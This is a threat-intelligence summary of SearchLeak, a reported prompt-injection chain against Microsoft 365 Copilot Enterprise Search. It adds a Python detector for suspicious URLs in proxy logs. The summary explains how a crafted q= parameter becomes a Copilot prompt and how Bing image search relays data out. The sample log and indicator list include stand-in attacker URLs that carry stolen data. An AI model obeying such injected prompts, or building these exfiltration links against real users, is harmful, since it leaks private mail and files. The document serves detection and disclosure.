Varonis Threat Labs discovered SearchLeak, a three-stage attack chain that turns Microsoft 365 Copilot Enterprise Search into a silent data exfiltration path by combining P2P injection, an HTML rendering race condition, and Bing-based SSRF. Microsoft patched the issue as CVE-2026-42824 with critical severity, and the chain could expose emails, security codes, calendar data, SharePoint documents, and OneDrive files with just a single click. #SearchLeak #Microsoft365CopilotEnterprise #CVE-2026-42824 #VaronisThreatLabs #Bing
Key points
- Varonis Threat Labs identified SearchLeak, a new attack chain against Microsoft 365 Copilot Enterprise Search.
- The chain combines three weaknesses: Parameter-to-Prompt (P2P) injection, an HTML rendering race condition, and SSRF through Bing.
- A victim only needs to click a crafted trusted-looking Microsoft link for the attack to begin.
- The attack can exfiltrate mailbox content, calendar data, SharePoint documents, OneDrive files, and other indexed organizational information.
- The exfiltration works because Copilot turns a URL parameter into an instruction, then renders attacker-controlled HTML before sanitization completes.
- Bing’s image search endpoint is abused as a server-side fetch proxy to bypass CSP restrictions and leak data to the attacker.
- Microsoft assigned the issue CVE-2026-42824 and rated it critical after remediation.
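As an added detection example (not code from the Varonis report), the following Python classifies proxy-log URLs against the two URL shapes the chain relies on: a Copilot Enterprise Search link whose q= parameter carries HTML markup or the $me= token listed among the indicators below, and a Bing searchbyimage link whose imgurl points outside an allowlist. The allowlist, the log format and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed allowlist of hosts that may legitimately be a Bing reverse-image target.
ALLOWED_IMAGE_HOSTS = {"www.microsoft.com", "sharepoint.com"}
# Markup that has no business inside a search prompt handed over via a URL parameter.
HTML_IN_PROMPT = re.compile(r"<\s*(img|iframe|script|svg)\b", re.I)

def classify_url(url: str) -> list[str]:
    """Return finding tags for one URL (empty list when nothing is suspicious)."""
    findings = []
    p = urlparse(url)
    host = p.netloc.lower()
    params = parse_qs(p.query, keep_blank_values=True)  # percent-decodes values
    # Stage 1: Copilot Enterprise Search treats q= as a prompt, so inspect it.
    if host == "m365.cloud.microsoft" and p.path.startswith("/search"):
        q = " ".join(params.get("q", []))
        if HTML_IN_PROMPT.search(q):
            findings.append("copilot-search:html-in-q")
        if "$me=" in q:  # token listed among the report's indicators
            findings.append("copilot-search:me-token-in-q")
    # Stage 3: Bing image search used as a server-side fetch proxy for exfiltration.
    if host == "www.bing.com" and p.path.startswith("/images/searchbyimage"):
        for img in params.get("imgurl", []):
            ih = urlparse(img).netloc.lower()
            if ih and not any(ih == a or ih.endswith("." + a) for a in ALLOWED_IMAGE_HOSTS):
                findings.append(f"bing-sbi:external-imgurl:{ih}")
    return findings

def scan_log(log: str) -> list[tuple[str, list[str]]]:
    # Assumed log format: "<timestamp> <user> <url>" per line; only hits are returned.
    hits = []
    for line in log.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        f = classify_url(parts[2])
        if f:
            hits.append((parts[2], f))
    return hits

# Constructed sample proxy log (not from the report); the injected q= value is
# URL-encoded the way a browser would send it.
SAMPLE_LOG = """2026-05-02T09:14:03Z alice https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=quarterly%20budget
2026-05-02T09:15:11Z bob https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=%3Cimg%20src%3Dhttps%3A%2F%2Fattacker.example%2Fx.png%3E
2026-05-02T09:15:12Z bob https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.example/SECRET/image.png
2026-05-02T09:20:00Z carol https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://www.microsoft.com/logo.png"""
```

Running `scan_log(SAMPLE_LOG)` flags only bob's two requests: the Copilot link with markup in q= and the Bing fetch of an external image URL.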
MITRE Techniques
- [T1059] Command and Scripting Interpreter – The attacker turns the URL parameter into executable instructions for Copilot, effectively using the prompt as a command channel. [‘the URL q parameter in Copilot Enterprise Search is passed directly to Copilot as an executable prompt’]
- [T1203] Exploitation for Client Execution – The victim’s browser executes attacker-influenced content after clicking the malicious link and rendering the injected HTML. [‘They click a link, and Copilot does the rest.’]
- [T1189] Drive-by Compromise – The attack begins when the victim clicks an unsuspicious trusted-domain link that silently triggers the exploit chain. [‘all from one click of an unsuspicious link’]
- [T1071.001] Web Protocols – The exfiltration occurs through browser and web requests to Bing and the attacker’s server over HTTP(S). [‘the browser renders it, and fires off an HTTP request to the src URL’]
- [T1190] Exploit Public-Facing Application – Copilot Enterprise Search and Bing’s public endpoints are abused as externally reachable services in the attack chain. [‘Bing’s image-search endpoint, allowlisted in the Content Security Policy, performs a server-side fetch’]
- [T1020] Data Exfiltration – The chain is explicitly designed to steal mailbox, calendar, and document content and deliver it to the attacker’s server. [‘the data ends up on the attacker’s server’]
- [T1213] Data from Information Repositories – Copilot searches and exposes indexed organizational data from email, calendar, SharePoint, and OneDrive. [‘searches their mailbox, calendar, and indexed organizational content’]
Indicators of Compromise
- [URL] Attack and exfiltration links – https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=, https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png
- [Domain] Microsoft and Bing endpoints used in the chain – m365.cloud.microsoft, www.bing.com, and attacker.com
- [Path / Parameter Content] Exfiltrated data in request path or embedded prompt – /Your_Security_Code_847291/img.png, $me=
- [CVE] Tracked vulnerability identifier – CVE-2026-42824
- [Product / Service] Affected platform and component – Microsoft 365 Copilot Enterprise Search, Copilot Personal, Bing Images
Read more: https://www.varonis.com/blog/searchleak